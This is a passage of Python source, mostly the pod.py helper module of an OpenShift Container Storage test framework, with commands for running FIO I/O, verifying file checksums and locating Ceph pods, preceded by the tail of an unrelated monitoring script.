sys.stdout.write('M{0} {1}\n'.format(metricId, days))
def config():
metrics = []
counter = 0;
for host in hosts:
metrics.append({
'id': counter,
'datatype': 'DOUBLE',
'name': host,
'description': description,
'groups': group,
'unit': '',
'tags': '',
'calctype': 'Instant'
})
counter += 1
print json.dumps({
'maxruntime': 5000,
'period': 3600, # Check every hour
'metrics': metrics
}, indent=4)
def data():
datapoints = {}
counter = 0;
threads = [None] * len(hosts)
for host in hosts:
threads[counter] = Thread(target = execute, args = (counter, hosts[host], ))
threads[counter].start()
counter += 1
# Wait for all threads to finish
for thread in threads:
thread.join()
#------------------------------------------------------------------------------
# Switch to check in which mode the script is running
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-c', action='store_true', help='output a JSON object detailing the metrics this script collects')
parser.add_argument('-d', action='store_true', help='output the metrics this script collects')
args = parser.parse_args()
if args.c:
config()
elif args.d:
data()
|
pod.py
|
"""
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from tests import helpers
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed, NonUpgradedImagesFoundError, ResourceWrongStatusException,
TimeoutExpiredError, UnavailableResourceException
)
from ocs_ci.ocs.utils import setup_ceph_toolbox
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.utils import run_cmd, check_timeout_reached, TimeoutSampler
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = '/var/lib/www/html/test'
FEDORA_TEST_FILE = '/mnt/test'
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode='w+', prefix='POD_', delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get('metadata').get('name')
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION, kind=constants.POD,
namespace=self.namespace
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get('status').get('containerStatuses')[0].get('restartCount')
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(FIO_TIMEOUT)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntaxt like &&, ||, ;, for loop and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get('metadata').get('labels')
def exec_ceph_cmd(self, ceph_cmd, format='json-pretty'):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if 'rook-ceph-tools' not in self.labels.values():
raise CommandFailed(
"Ceph commands can be executed only on toolbox pod"
)
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type='fs'):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == 'block':
return self.pod_data.get('spec').get('containers')[0].get(
'volumeDevices')[0].get('devicePath')
return (
self.pod_data.get(
'spec'
).get('containers')[0].get('volumeMounts')[0].get('mountPath')
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = 'fio'
name = f'test_workload_{work_load}'
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(
name, path, work_load, storage_type, self, jobs
)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self, storage_type, size, io_direction='rw', rw_ratio=75,
jobs=1, runtime=60, depth=4, rate='1m', rate_process='poisson', fio_filename=None, bs='4K'
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == 'rw':
self.io_params = templating.load_yaml(
constants.FIO_IO_RW_PARAMS_YAML
)
self.io_params['rwmixread'] = rw_ratio
else:
self.io_params = templating.load_yaml(
constants.FIO_IO_PARAMS_YAML
)
self.io_params['runtime'] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params['size'] = size
if fio_filename:
self.io_params['filename'] = fio_filename
self.io_params['iodepth'] = depth
self.io_params['rate'] = rate
self.io_params['rate_process'] = rate_process
self.io_params['bs'] = bs
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self):
"""
Execute git clone on a pod to simulate a Jenkins user
"""
name = 'test_workload'
work_load = 'jenkins'
wl = workload.WorkLoad(
name=name,
work_load=work_load,
pod=self,
path=self.get_storage_path()
)
assert wl.setup(), "Setup up for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = ' '.join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f"scp -i {authkey} -o \"StrictHostKeyChecking no\""
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f"ssh -i {authkey} -o \"StrictHostKeyChecking no\" {user}@{server} {cmd}"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self):
"""
Get the pod memory size
Returns:
dict: The names of the pod's containers (str) as keys and their memory
size (str) as values
"""
containers = self.pod_data.get('spec').get('containers')
container_names_and_memory = {
container.get('name'): container.get('resources')
.get('limits').get('memory') for container in containers
}
return container_names_and_memory
# Helper functions for Pods
def get_all_pods(
namespace=None, selector=None, selector_label='app',
exclude_selector=False, wait=False
):
"""
Get all pods in a namespace.
Args:
namespace (str): Name of the namespace
If namespace is None - get all pods
selector (list) : List of the resource selector to search with.
Example: ['alertmanager','prometheus']
selector_label (str): Label of selector (default: app).
exclude_selector (bool): If list of the resource selector not to search with
Returns:
list: List of Pod objects
"""
ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace)
# In case of >4 worker nodes node failures automatic failover of pods to
# other nodes will happen.
# So, we are waiting for the pods to come up on new node
if wait:
wait_time = 180
logger.info(f"Waiting for {wait_time}s for the pods to stabilize")
time.sleep(wait_time)
pods = ocp_pod_obj.get()['items']
if selector:
if exclude_selector:
pods_new = [
pod for pod in pods if
pod['metadata'].get(
'labels', {}
).get(selector_label) not in selector
]
else:
pods_new = [
pod for pod in pods if
pod['metadata'].get(
'labels', {}
).get(selector_label) in selector
]
pods = pods_new
pod_objs = [Pod(**pod) for pod in pods]
return pod_objs
def get_ceph_tools_pod():
"""
Get the Ceph tools pod
Returns:
Pod object: The Ceph tools pod object
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
ct_pod_items = ocp_pod_obj.get(
selector='app=rook-ceph-tools'
)['items']
if not ct_pod_items:
# setup ceph_toolbox pod if the cluster has been setup by some other CI
setup_ceph_toolbox()
ct_pod_items = ocp_pod_obj.get(
selector='app=rook-ceph-tools'
)['items']
assert ct_pod_items, "No Ceph tools pod found"
# In the case of node failure, the CT pod will be recreated with the old
# one in status Terminated. Therefore, need to filter out the Terminated pod
running_ct_pods = list()
for pod in ct_pod_items:
if ocp_pod_obj.get_resource_status(
pod.get('metadata').get('name')
) == constants.STATUS_RUNNING:
running_ct_pods.append(pod)
assert running_ct_pods, "No running Ceph tools pod found"
ceph_pod = Pod(**running_ct_pods[0])
return ceph_pod
def get_csi_provisioner_pod(interface):
"""
Get the provisioner pod based on interface
Returns:
Pod object: The provisioner pod object based on iterface
"""
ocp_pod_obj = OCP(
kind=constants.POD, namespace=config.ENV_DATA['cluster_namespace']
)
selector = 'app=csi-rbdplugin-provisioner' if (
interface == constants.CEPHBLOCKPOOL
) else 'app=csi-cephfsplugin-provisioner'
provision_pod_items = ocp_pod_obj.get(
selector=selector
)['items']
assert provision_pod_items, f"No {interface} provisioner pod found"
provisioner_pod = (
Pod(**provision_pod_items[0]).name,
Pod(**provision_pod_items[1]).name
)
return provisioner_pod
def get_rgw_pods(rgw_label=constants.RGW_APP_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
rgw_label (str): label associated with rgw pods
(default: defaults.RGW_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
list: Pod objects of rgw pods
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
rgws = get_pods_having_label(rgw_label, namespace)
return [Pod(**rgw) for rgw in rgws]
def get_ocs_operator_pod(ocs_label=constants.OCS_OPERATOR_LABEL, namespace=None):
"""
Fetches info about rgw pods in the cluster
Args:
ocs_label (str): label associated with ocs_operator pod
(default: defaults.OCS_OPERATOR_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: none)
Returns:
Pod object: ocs_operator pod object
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
ocs_operator = get_pods_having_label(ocs_label, namespace)
ocs_operator_pod = Pod(**ocs_operator[0])
return ocs_operator_pod
def list_ceph_images(pool_name='rbd'):
"""
Args:
pool_name (str): Name of the pool to get the ceph images
Returns (List): List of RBD images in the pool
"""
ct_pod = get_ceph_tools_pod()
return ct_pod.exec_ceph_cmd(ceph_cmd=f"rbd ls {pool_name}", format='json')
@retry(TypeError, tries=5, delay=2, backoff=1)
def check_file_existence(pod_obj, file_path):
"""
Check if file exists inside the pod
Args:
pod_obj (Pod): The object of the pod
file_path (str): The full path of the file to look for inside
the pod
Returns:
bool: True if the file exist, False otherwise
"""
try:
check_if_executable_in_path(pod_obj.exec_cmd_on_pod("which find"))
except CommandFailed:
pod_obj.install_packages("findutils")
ret = pod_obj.exec_cmd_on_pod(f"bash -c \"find {file_path}\"")
if re.search(file_path, ret):
return True
return False
def get_file_path(pod_obj, file_name):
"""
Get the full path of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which path to get
Returns:
str: The full path of the file
"""
path = (
pod_obj.get().get('spec').get('containers')[0].get(
'volumeMounts')[0].get('mountPath')
)
file_path = os.path.join(path, file_name)
return file_path
def cal_md5sum(pod_obj, file_name):
"""
Calculates the md5sum of the file
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
Returns:
str: The md5sum of the file
"""
file_path = get_file_path(pod_obj, file_name)
md5sum_cmd_out = pod_obj.exec_cmd_on_pod(
command=f"bash -c \"md5sum {file_path}\"", out_yaml_format=False
)
md5sum = md5sum_cmd_out.split()[0]
logger.info(f"md5sum of file {file_name}: {md5sum}")
return md5sum
def verify_data_integrity(pod_obj, file_name, original_md5sum):
"""
Verifies existence and md5sum of file created from first pod
Args:
pod_obj (Pod): The object of the pod
file_name (str): The name of the file for which md5sum to be calculated
original_md5sum (str): The original md5sum of the file
Returns:
bool: True if the file exists and md5sum matches
Raises:
AssertionError: If file doesn't exist or md5sum mismatch
"""
file_path = get_file_path(pod_obj, file_name)
assert check_file_existence(pod_obj, file_path), (
f"File {file_name} doesn't exists"
)
current_md5sum = cal_md5sum(pod_obj, file_name)
logger.info(f"Original md5sum of file: {original_md5sum}")
logger.info(f"Current md5sum of file: {current_md5sum}")
assert current_md5sum == original_md5sum, (
'Data corruption found'
)
logger.info(f"File {file_name} exists and md5sum matches")
return True
def get_fio_rw_iops(pod_obj):
"""
Execute FIO on a pod
Args:
pod_obj (Pod): The object of the pod
"""
fio_result = pod_obj.get_fio_results()
logging.info(f"FIO output: {fio_result}")
logging.info("IOPs after FIO:")
logging.info(
f"Read: {fio_result.get('jobs')[0].get('read').get('iops')}"
)
logging.info(
f"Write: {fio_result.get('jobs')[0].get('write').get('iops')}"
)
def run_io_in_bg(pod_obj, expect_to_fail=False, fedora_dc=False):
"""
Run I/O in the background
Args:
pod_obj (Pod): The object of the pod
expect_to_fail (bool): True for the command to be expected to fail
(disruptive operations), False otherwise
fedora_dc (bool): set to False by default. If set to True, it runs IO in
background on a fedora dc pod.
Returns:
Thread: A thread of the I/O execution
"""
logger.info(f"Running I/O on pod {pod_obj.name}")
def exec_run_io_cmd(pod_obj, expect_to_fail, fedora_dc):
"""
Execute I/O
"""
try:
# Writing content to a new file every 0.01 seconds.
# Without sleep, the device will run out of space very quickly -
# 5-10 seconds for a 5GB device
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
pod_obj.exec_cmd_on_pod(
command=f"bash -c \"let i=0; while true; do echo "
f"{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done\"",
timeout=2400
)
# Once the pod gets deleted, the I/O execution will get terminated.
# Hence, catching this exception
except CommandFailed as ex:
if expect_to_fail:
if re.search("code 137", str(ex)) or (
re.search("code 143", str(ex))
):
logger.info("I/O command got terminated as expected")
return
raise ex
thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc))
thread.start()
time.sleep(2)
# Checking file existence
if fedora_dc:
FILE = FEDORA_TEST_FILE
else:
FILE = TEST_FILE
test_file = FILE + "1"
# Check I/O started
try:
for sample in TimeoutSampler(
timeout=20, sleep=1, func=check_file_existence,
pod_obj=pod_obj, file_path=test_file
):
if sample:
break
logger.info(f"Waiting for I/O to start inside {pod_obj.name}")
except TimeoutExpiredError:
logger.error(
f"Wait timeout: I/O failed to start inside {pod_obj.name}. "
"Collect file list."
)
parent_dir = os.path.join(TEST_FILE, os.pardir)
pod_obj.exec_cmd_on_pod(
command=f'ls -l {os.path.abspath(parent_dir)}',
out_yaml_format=False
)
raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}")
return thread
def get_admin_key_from_ceph_tools():
"""
Fetches admin key secret from ceph
Returns:
admin keyring encoded with base64 as a string
"""
tools_pod = get_ceph_tools_pod()
out = tools_pod.exec_ceph_cmd(ceph_cmd='ceph auth get-key client.admin')
base64_output = base64.b64encode(out['key'].encode()).decode()
return base64_output
def run_io_and_verify_mount_point(pod_obj, bs='10M', count='950'):
"""
Run I/O on mount point
Args:
pod_obj (Pod): The object of the pod
bs (str): Read and write up to bytes at a time
count (str): Copy only N input blocks
Returns:
used_percentage (str): Used percentage on mount point
"""
pod_obj.exec_cmd_on_pod(
command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}"
)
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index('/var/lib/www/html') - 1]
return used_percentage
def get_pods_having_label(label, namespace):
"""
Fetches pod resources with given label in given namespace
Args:
label (str): label which pods might have
namespace (str): Namespace in which to be looked up
Return:
list: of pods info
"""
ocp_pod = OCP(kind=constants.POD, namespace=namespace)
pods = ocp_pod.get(selector=label).get('items')
return pods
def get_deployments_having_label(label, namespace):
"""
Fetches deployment resources with given label in given namespace
Args:
label (str): label which deployments might have
namespace (str): Namespace in which to be looked up
Return:
list: deployment OCP instances
"""
ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace)
pods = ocp_deployment.get(selector=label).get('items')
return pods
def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None):
"""
Fetches info about mds pods in the cluster
Args:
mds_label (str): label associated with mds pods
(default: defaults.MDS_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mds pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mdss = get_pods_having_label(mds_label, namespace)
mds_pods = [Pod(**mds) for mds in mdss]
return mds_pods
def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None):
"""
Fetches info about mon pods in the cluster
Args:
mon_label (str): label associated with mon pods
(default: defaults.MON_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mon pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mons = get_pods_having_label(mon_label, namespace)
mon_pods = [Pod(**mon) for mon in mons]
return mon_pods
def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None):
"""
Fetches info about mgr pods in the cluster
Args:
mgr_label (str): label associated with mgr pods
(default: defaults.MGR_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of mgr pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
mgrs = get_pods_having_label(mgr_label, namespace)
mgr_pods = [Pod(**mgr) for mgr in mgrs]
return mgr_pods
def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd pods in the cluster
Args:
osd_label (str): label associated with osd pods
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : of osd pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_pods_having_label(osd_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_prepare_pods(
osd_prepare_label=constants.OSD_PREPARE_APP_LABEL, namespace=defaults.ROOK_CLUSTER_NAMESPACE
):
"""
Fetches info about osd prepare pods in the cluster
Args:
osd_prepare_label (str): label associated with osd prepare pods
(default: constants.OSD_PREPARE_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD prepare pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_pods_having_label(osd_prepare_label, namespace)
osd_pods = [Pod(**osd) for osd in osds]
return osd_pods
def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None):
"""
Fetches info about osd deployments in the cluster
Args:
osd_label (str): label associated with osd deployments
(default: defaults.OSD_APP_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list: OSD deployment OCS instances
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
osds = get_deployments_having_label(osd_label, namespace)
osd_deployments = [OCS(**osd) for osd in osds]
return osd_deployments
def get_pod_count(label, namespace=None):
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(label=label, namespace=namespace)
return len(pods)
def get_cephfsplugin_provisioner_pods(
cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL,
namespace=None
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
cephfsplugin_provisioner_label (str): label associated with cephfs
provisioner pods
(default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-cephfsplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace)
fs_plugin_pods = [Pod(**pod) for pod in pods]
return fs_plugin_pods
def get_rbdfsplugin_provisioner_pods(
rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL,
namespace=None
):
"""
Fetches info about CSI Cephfs plugin provisioner pods in the cluster
Args:
rbdplugin_provisioner_label (str): label associated with RBD
provisioner pods
(default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL)
namespace (str): Namespace in which ceph cluster lives
(default: defaults.ROOK_CLUSTER_NAMESPACE)
Returns:
list : csi-rbdplugin-provisioner Pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
pods = get_pods_having_label(rbdplugin_provisioner_label, namespace)
ebd_plugin_pods = [Pod(**pod) for pod in pods]
return ebd_plugin_pods
def get_pod_obj(name, namespace=None):
"""
Returns the pod obj for the given pod
Args:
name (str): Name of the resources
Returns:
obj : A pod object
"""
ocp_obj = OCP(api_version='v1', kind=constants.POD, namespace=namespace)
ocp_dict = ocp_obj.get(resource_name=name)
pod_obj = Pod(**ocp_dict)
return pod_obj
def get_pod_logs(pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False):
"""
Get logs from a given pod
pod_name (str): Name of the pod
container (str): Name of the container
namespace (str): Namespace of the pod
previous (bool): True, if pod previous log required. False otherwise.
Returns:
str: Output from 'oc get logs <pod_name> command
"""
pod = OCP(
kind=constants.POD, namespace=namespace
)
cmd = f"logs {pod_name}"
if container:
cmd += f" -c {container}"
if previous:
cmd += " --previous"
return pod.exec_oc_cmd(cmd, out_yaml_format=False)
def get_pod_node(pod_obj):
"""
Get the node that the pod is running on
Args:
pod_obj (OCS): The pod object
Returns:
ocs_ci.ocs.ocp.OCP: The node object
"""
node_name = pod_obj.get().get('spec').get('nodeName')
return node.get_node_objs(node_names=node_name)[0]
def delete_pods(pod_objs, wait=True):
"""
Deletes list of the pod objects
Args:
pod_objs (list): List of the pod objects to be deleted
wait (bool): Determines if the delete command should wait for
completion
"""
for pod in pod_objs:
pod.delete(wait=wait)
def validate_pods_are_respinned_and_running_state(pod_objs_list):
"""
Verifies the list of the pods are respinned and in running state
Args:
pod_objs_list (list): List of the pods obj
Returns:
bool : True if the pods are respinned and running, False otherwise
Raises:
ResourceWrongStatusException: In case the resources hasn't
reached the Running state
"""
for pod in pod_objs_list:
helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180)
for pod in pod_objs_list:
pod_obj = pod.get()
start_time = pod_obj['status']['startTime']
ts = time.strptime(start_time, '%Y-%m-%dT%H:%M:%SZ')
ts = calendar.timegm(ts)
current_time_utc = time.time()
sec = current_time_utc - ts
if (sec / 3600) >= 1:
logger.error(
f'Pod {pod.name} is not respinned, the age of the pod is {start_time}'
)
return False
return True
def verify_node_name(pod_obj, node_name):
"""
Verifies that the pod is running on a particular node
Args:
pod_obj (Pod): The pod object
node_name (str): The name of node to check
Returns:
bool: True if the pod is running on a particular node, False otherwise
"""
logger.info(
f"Checking whether the pod {pod_obj.name} is running on "
f"node {node_name}"
)
actual_node = pod_obj.get().get('spec').get('nodeName')
if actual_node == node_name:
logger.info(
f"The pod {pod_obj.name} is running on the specified node "
f"{actual_node}"
)
return True
else:
logger.info(
f"The pod {pod_obj.name} is not running on the specified node "
f"specified node: {node_name}, actual node: {actual_node}"
)
return False
def get_pvc_name(pod_obj):
"""
Function to get pvc_name from pod_obj
Args:
pod_obj (str): The pod object
Returns:
str: The pvc name of a given pod_obj,
Raises:
UnavailableResourceException: If no pvc attached
"""
pvc = pod_obj.get().get('spec').get('volumes')[0].get('persistentVolumeClaim')
if not pvc:
raise UnavailableResourceException
return pvc.get('claimName')
def get_used_space_on_mount_point(pod_obj):
"""
Get the used space on a mount point
Args:
pod_obj (POD): The pod object
Returns:
int: Percentage represent the used space on the mount point
"""
# Verify data's are written to mount-point
mount_point = pod_obj.exec_cmd_on_pod(command="df -kh")
mount_point = mount_point.split()
used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1]
return used_percentage
def get_plugin_pods(interface, namespace=None):
"""
Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects
"""
if interface == constants.CEPHFILESYSTEM:
plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL
if interface == constants.CEPHBLOCKPOOL:
plugin_label = constants.CSI_RBDPLUGIN_LABEL
namespace = namespace or config.ENV_DATA['cluster_namespace']
plugins_info = get_pods_having_label(plugin_label, namespace)
plugin_pods = [Pod(**plugin) for plugin in plugins_info]
return plugin_pods
def plugin_provisioner_leader(interface, namespace=None):
"""
Find csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod
Args:
interface (str): Interface type. eg: CephBlockPool, CephFileSystem
namespace (str): Name of cluster namespace
Returns:
Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader
pod
"""
non_leader_msg = 'failed to acquire lease'
lease_acq_msg = 'successfully acquired lease'
lease_renew_msg = 'successfully renewed lease'
leader_pod = ''
if interface == constants.CEPHBLOCKPOOL:
pods = get_rbdfsplugin_provisioner_pods(namespace=namespace)
if interface == constants.CEPHFILESYSTEM:
pods = get_cephfsplugin_provisioner_pods(namespace=namespace)
pods_log = {}
for pod in pods:
pods_log[pod] = get_pod_logs(
pod_name=pod.name, container='csi-provisioner'
).split('\n')
for pod, log_list in pods_log.items():
# Reverse the list to find last occurrence of message without
# iterating over all elements
log_list.reverse()
for log_msg in log_list:
# Check for last occurrence of leader messages.
# This will be the first occurrence in reversed list.
if (lease_renew_msg in log_msg) or (lease_acq_msg in log_msg):
curr_index = log_list.index(log_msg)
# Ensure that there is no non leader message logged after
# the last occurrence of leader message
if not any(
non_leader_msg in msg for msg in log_list[:curr_index]
):
assert not leader_pod, (
"Couldn't identify plugin provisioner leader pod by "
"analysing the logs. Found more than one match."
)
leader_pod = pod
break
assert leader_pod, "Couldn't identify plugin provisioner leader pod."
logger.info(f"Plugin provisioner leader pod is {leader_pod.name}")
return leader_pod
def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None):
"""
Fetches info about rook-ceph-operator pods in the cluster
Args:
operator_label (str): Label associated with rook-ceph-operator pod
namespace (str): Namespace in which ceph cluster lives
Returns:
list : of rook-ceph-operator pod objects
"""
namespace = namespace or config.ENV_DATA['cluster_namespace']
operators = get_pods_having_label(operator_label, namespace)
operator_pods = [Pod(**operator) for operator in operators]
return operator_pods
def upload(pod_name, localpath, remotepath, namespace=None):
"""
Upload a file to pod
Args:
pod_name (str): Name of the pod
localpath (str): Local file to upload
remotepath (str): Target path on the pod
"""
namespace = namespace or constants.DEFAULT_NAMESPACE
